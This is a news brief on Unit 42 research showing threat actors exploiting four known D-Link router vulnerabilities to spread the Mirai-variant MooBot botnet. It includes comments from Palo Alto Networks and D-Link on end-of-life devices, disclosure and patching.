Dive Brief:
- Threat actors are exploiting vulnerabilities in D-Link routers to spread a variant of Mirai malware called MooBot, which targets exposed networking devices running Linux, according to research released Tuesday from Palo Alto Networks' Unit 42.
- Though the manufacturer has published security bulletins for the vulnerabilities, users may be running older or unpatched versions of D-Link devices, according to the report.
- The report cites four known vulnerabilities exploited in the attacks. During a successful operation, the wget utility downloads samples of the malware variant.
Dive Insight:
MooBot was originally discovered in September 2019 by security firm Qihoo 360. MooBot is spread by threat actors taking advantage of a device’s default credentials, n-day or zero-day vulnerabilities, according to researchers.
“Once MooBot starts executing on the compromised devices, attackers can add the compromised devices to their botnet and launch DDoS attacks for different purposes,” Zhibin Zhang, senior principal researcher at Palo Alto Networks, said.
The vulnerabilities include the following:
- CVE-2015-2051 D-Link HNAP SOAPAction Header Command Execution Vulnerability
- CVE-2018-6530 D-Link SOAP Interface Remote Code Execution Vulnerability
- CVE-2022-26258 D-Link Remote Code Execution Vulnerability
- CVE-2022-28958 D-Link Remote Code Execution Vulnerability
Researchers from Palo Alto Networks Unit 42 originally noticed the activity in August, which involved exploitation of D-Link home routers designed for consumer use. However, many corporate workers continue to work remotely, and are therefore using the routers for work.
William Brown, senior vice president of operations and CISO at D-Link, said nearly all the products involved reached end-of-life (EOL) or end-of-service (EOS) about four years ago. Brown said the devices should be retired and replaced.
“We didn’t know about it, even though we are scanning the net all the time,” Brown said via email.
Brown said the researchers may have noticed the vulnerabilities as they are no longer supported due to reaching end of life status.
Asked whether researchers had reached out to the company, Jen Miller Osborn, deputy director of threat intelligence at Unit 42, said once a proof of concept is public, attackers are known to begin exploiting them within 24 hours.
“Typical responsible disclosure focuses on 90 days – some of the vulnerabilities in our blog date back to 2015,” Osborn noted via email.
Osborn said at this point the onus is on the users to apply patches, and researchers strongly recommend they apply upgrades and patches where possible. Brown said the company will follow up with the researchers.
D-Link issued a bulletin on Wednesday with information about the security issue after Cybersecurity Dive reached out to request a comment on the report. Brown said the company’s direct-to-consumer channel will typically offer a low-cost upgrade for such devices.
